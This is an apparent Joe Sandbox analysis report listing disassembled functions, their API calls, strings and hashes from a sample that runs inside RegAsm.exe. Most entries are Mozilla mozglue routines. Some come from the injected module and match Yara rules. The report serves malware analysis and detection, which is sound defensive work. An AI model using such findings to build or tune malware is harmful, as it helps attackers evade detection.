Function 6C094180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C094196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C0941F1
VerSetConditionMask.NTDLL ref: 6C094223
VerSetConditionMask.NTDLL ref: 6C09422A
VerSetConditionMask.NTDLL ref: 6C094231
VerSetConditionMask.NTDLL ref: 6C094238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C094245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C094263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C09427A
FreeLibrary.KERNEL32(?), ref: 6C094299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0942C4
VerSetConditionMask.NTDLL ref: 6C0942F6
VerSetConditionMask.NTDLL ref: 6C094302
VerSetConditionMask.NTDLL ref: 6C094309
VerSetConditionMask.NTDLL ref: 6C094310
VerSetConditionMask.NTDLL ref: 6C094317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C094324

Strings

SetProcessDpiAwareness, xrefs: 6C094274
Shcore.dll, xrefs: 6C09425E

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: 01d086f938465c9460d6aebf470ee5c7514022010bbed113c1152a8ae2fb2e5d
Instruction ID: 347c6199f7ad204c40ffc64fbe105b9fa78fa301d748b8b615a34b353aaded2c
Opcode Fuzzy Hash: 01d086f938465c9460d6aebf470ee5c7514022010bbed113c1152a8ae2fb2e5d
Instruction Fuzzy Hash: BA512271B042106BEB10ABB58C49BAA77F8EF86B54F01851CFA65AB6C0CF74D940DB91

Function 6C0CEE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C094A68), ref: 6C0C945E
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0C9470
Part of subcall function 6C0C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0C9482
Part of subcall function 6C0C9420: __Init_thread_footer.LIBCMT ref: 6C0C949F

GetCurrentThreadId.KERNEL32 ref: 6C0CEE60
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEE6D
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C0CEEA5
CloseHandle.KERNEL32(?), ref: 6C0CEEB4
free.MOZGLUE(00000000), ref: 6C0CEEBB
GetCurrentThreadId.KERNEL32 ref: 6C0CEEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CEECF

Part of subcall function 6C0CDE60: GetCurrentThreadId.KERNEL32 ref: 6C0CDE73
Part of subcall function 6C0CDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C094A68), ref: 6C0CDE7B
Part of subcall function 6C0CDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C094A68), ref: 6C0CDEB8
Part of subcall function 6C0CDE60: free.MOZGLUE(00000000,?,6C094A68), ref: 6C0CDEFE
Part of subcall function 6C0CDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C0CDF38

Part of subcall function 6C0BCBE8: GetCurrentProcess.KERNEL32(?,6C0831A7), ref: 6C0BCBF1
Part of subcall function 6C0BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0831A7), ref: 6C0BCBFA

GetCurrentThreadId.KERNEL32 ref: 6C0CEF1E
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEF2B
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEF59
GetCurrentThreadId.KERNEL32 ref: 6C0CEFB0
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEFBD
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CEFE1
GetCurrentThreadId.KERNEL32 ref: 6C0CEFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF000

Part of subcall function 6C0C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0C94EE
Part of subcall function 6C0C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0C9508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C0CF02F

Part of subcall function 6C0CF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0CF09B
Part of subcall function 6C0CF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C0CF0AC
Part of subcall function 6C0CF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C0CF0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C0CF008
[I %d/%d] profiler_stop, xrefs: 6C0CEED7

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 7bd090fb3f5aba0015b45d7d158b3253f8e4de75626d4e6fa9554bff8801d090
Instruction ID: e69dd96a482d64ead30a4ea680728286f3d6cd2dc2b6c6af1b5dafec4280a634
Opcode Fuzzy Hash: 7bd090fb3f5aba0015b45d7d158b3253f8e4de75626d4e6fa9554bff8801d090
Instruction Fuzzy Hash: 8D51AF357042149FDB00AB64D40ABAA7BF8EB4635CF20055EED3583B80DF755805D7AB

Function 6C0BD010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C10E804), ref: 6C0BD047
GetSystemInfo.KERNEL32(?), ref: 6C0BD093
__Init_thread_footer.LIBCMT ref: 6C0BD0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C10E810,00000040), ref: 6C0BD0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C10E7B8,00001388), ref: 6C0BD147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C10E744,00001388), ref: 6C0BD162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C10E784,00001388), ref: 6C0BD18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C10E7DC,00001388), ref: 6C0BD1B1

Strings

MALLOC_OPTIONS, xrefs: 6C0BD0CB
Compile-time page size does not divide the runtime one., xrefs: 6C0BD26D
<jemalloc>, xrefs: 6C0BD268, 6C0BD311
: (malloc) Unsupported character in malloc options: ', xrefs: 6C0BD322
MOZ_CRASH(), xrefs: 6C0BD277

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 609151ebef0942df0783b153daa2f81758d8d53a38591a29367cacd1650d0711
Instruction ID: ebe61fc62448e58472c5af1b0849e30cbc7350482e75de9934f24cb65ff7ea98
Opcode Fuzzy Hash: 609151ebef0942df0783b153daa2f81758d8d53a38591a29367cacd1650d0711
Instruction Fuzzy Hash: 1E81DF70B043009BEB04DF6AC844B69BBF4EF16709F10052EEA91A7B84DF729605DBD1

Function 6C0CFAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0CFADC
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CFAE9
GetCurrentThreadId.KERNEL32 ref: 6C0CFB31
GetCurrentThreadId.KERNEL32 ref: 6C0CFB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C0CFBF6
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C0CFC50

Strings

[D %d/%d] profiler_unregister_thread: %s, xrefs: 6C0CFC94
[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C0CFD15

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: bf5119f1586d04058aa992773b3372e879aeb602d092c0bd0d5d1b8f458180ec
Instruction ID: 32b44e2f0a9b76bb49606e312b6f0aebfc378f9164a9adb0403ffca1cd5c6667
Opcode Fuzzy Hash: bf5119f1586d04058aa992773b3372e879aeb602d092c0bd0d5d1b8f458180ec
Instruction Fuzzy Hash: C671AA71B046008FD714DF29C584BAEB7F9AF85308F51856EE8558BB51EB34A805CB93

Function 004139C2 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
ExitProcess.KERNEL32 ref: 004139E2
strtok_s.MSVCRT ref: 004139F3

Strings

DwA, xrefs: 004139EC, 004139EF
block, xrefs: 004139CB

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: DwA$block
API String ID: 3407564107-4170876926
Opcode ID: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
Opcode Fuzzy Hash: b2a6181841c0a819a6165bd9744e598bbe62174f59a4a8c8ae2e29f6798705dd
Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58

Function 0041B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,759183C0,00000000,0041C55B,?), ref: 0041B875
StrCmpCA.SHLWAPI(759183C0,0043613C), ref: 0041B8A3
StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0041B8B3
StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0041B8BF
StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0041B8CB
StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0041B8D7
StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0041B8E3
StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0041B8EF
StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0041B8FB

Strings

.zoo, xrefs: 0041B8B9
.arc, xrefs: 0041B8C5
.arj, xrefs: 0041B8DD
.gz, xrefs: 0041B8E9
.zip, xrefs: 0041B8AD
.tgz, xrefs: 0041B8F5
.lzh, xrefs: 0041B8D1

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction ID: 4d0ab467417de3272ea9e1328912bf8f077e80ad604b43416a02b9711c478325
Opcode Fuzzy Hash: 54ae333f8b5274885e17379ca82bd682d21753aa1aef1686f1ee84574de7c63d
Instruction Fuzzy Hash: 41015239A89227B56A223631AD81FBF1E5C8D86F807151037E845A2188DB5C998355FD

Function 6C095E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C095E9D

Part of subcall function 6C0A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5B85
Part of subcall function 6C0A5B50: EnterCriticalSection.KERNEL32(6C10F688,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5B90
Part of subcall function 6C0A5B50: LeaveCriticalSection.KERNEL32(6C10F688,?,?,?,6C0A56EE,?,00000001), ref: 6C0A5BD8
Part of subcall function 6C0A5B50: GetTickCount64.KERNEL32 ref: 6C0A5BE4

GetCurrentThreadId.KERNEL32 ref: 6C095EAB
GetCurrentThreadId.KERNEL32 ref: 6C095EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C095ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C096017

Part of subcall function 6C084310: moz_xmalloc.MOZGLUE(00000010,?,6C0842D2), ref: 6C08436A
Part of subcall function 6C084310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0842D2), ref: 6C084387

moz_xmalloc.MOZGLUE(00000004), ref: 6C095F47
GetCurrentProcess.KERNEL32 ref: 6C095F53
GetCurrentThread.KERNEL32 ref: 6C095F5C
GetCurrentProcess.KERNEL32 ref: 6C095F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C095F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C095F27

Part of subcall function 6C09CA10: mozalloc_abort.MOZGLUE(?), ref: 6C09CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0955E1), ref: 6C095E8C

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0955E1), ref: 6C09605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C0955E1), ref: 6C0960CC

Strings

GeckoMain, xrefs: 6C095ECE, 6C096015

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: f9798b0f457ec79c1dd0784a57a2a2a626252c1bde1a410bd4c5b2aa7d5bfe08
Instruction ID: 514ce1b20831baf12dcbc0bbac278f116bf4d335f185db0268c3ade1e106ac5c
Opcode Fuzzy Hash: f9798b0f457ec79c1dd0784a57a2a2a626252c1bde1a410bd4c5b2aa7d5bfe08
Instruction Fuzzy Hash: C071D1B4A087409FD710DF29C480B6ABBF0FF89304F54592DE98687B52DB31E948DB92

Function 6C099590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0831C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C083217
Part of subcall function 6C0831C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C083236
Part of subcall function 6C0831C0: FreeLibrary.KERNEL32 ref: 6C08324B
Part of subcall function 6C0831C0: __Init_thread_footer.LIBCMT ref: 6C083260
Part of subcall function 6C0831C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C08327F
Part of subcall function 6C0831C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C08328E
Part of subcall function 6C0831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0832AB
Part of subcall function 6C0831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C0832D1
Part of subcall function 6C0831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C0832E5
Part of subcall function 6C0831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C0832F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C099675
__Init_thread_footer.LIBCMT ref: 6C099697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0996E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C099707
__Init_thread_footer.LIBCMT ref: 6C09971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C099773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0997B7
FreeLibrary.KERNEL32 ref: 6C0997D0
FreeLibrary.KERNEL32 ref: 6C0997EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C099824

Strings

Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C099670
NtMapViewOfSection, xrefs: 6C099701
ntdll.dll, xrefs: 6C0996E3
MapViewOfFileNuma2, xrefs: 6C0997B1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 36f0039e9f1fa92523effdeee4c33705baa6ca405fe0c370a8cc0427af5c6aa1
Instruction ID: beb888ca947d05a34b66c20bc8866bfc86a9de22d2a17c5a9647a4387f411030
Opcode Fuzzy Hash: 36f0039e9f1fa92523effdeee4c33705baa6ca405fe0c370a8cc0427af5c6aa1
Instruction Fuzzy Hash: C761DF717002059FDF00DFA8D889B9A7BF5FB4A319F10812DE92993780DF30A944EB92

Function 6C083AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C10E768,?,00003000,00000004), ref: 6C083AC5
LeaveCriticalSection.KERNEL32(6C10E768,?,00003000,00000004), ref: 6C083AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C083AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C083B57
EnterCriticalSection.KERNEL32(6C10E784), ref: 6C083B81
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C083BA3
EnterCriticalSection.KERNEL32(6C10E7B8), ref: 6C083BAE
LeaveCriticalSection.KERNEL32(6C10E7B8), ref: 6C083C74
EnterCriticalSection.KERNEL32(6C10E784), ref: 6C083C8B
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C083C9F
LeaveCriticalSection.KERNEL32(6C10E7B8), ref: 6C083D5C
EnterCriticalSection.KERNEL32(6C10E784), ref: 6C083D67
LeaveCriticalSection.KERNEL32(6C10E784), ref: 6C083D8A

Part of subcall function 6C0C0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C083DEF), ref: 6C0C0D71
Part of subcall function 6C0C0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C083DEF), ref: 6C0C0D84

Strings

<jemalloc>, xrefs: 6C083DC7
: (malloc) Error in VirtualFree(), xrefs: 6C083DCC
MOZ_CRASH(), xrefs: 6C083DB2

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: 19a6792db01be35e3bf503ea81acc21743798fdb7a9b38016695f15e653cd2be
Instruction ID: a8c86ca0ced02816b4682cd824b4b55903727694483b0e9800ba6b351e1999a9
Opcode Fuzzy Hash: 19a6792db01be35e3bf503ea81acc21743798fdb7a9b38016695f15e653cd2be
Instruction Fuzzy Hash: DF919B717022058BDF04CF69C884B6E77F2BF89719F248528E9219BB81DB71E901DBD1

Function 6C097FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C098007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C09801D

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C09802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C09803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C09808D

Part of subcall function 6C09CA10: mozalloc_abort.MOZGLUE(?), ref: 6C09CAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C09809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C0980B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C0980DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0980ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0980FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C09810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C098133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C098149
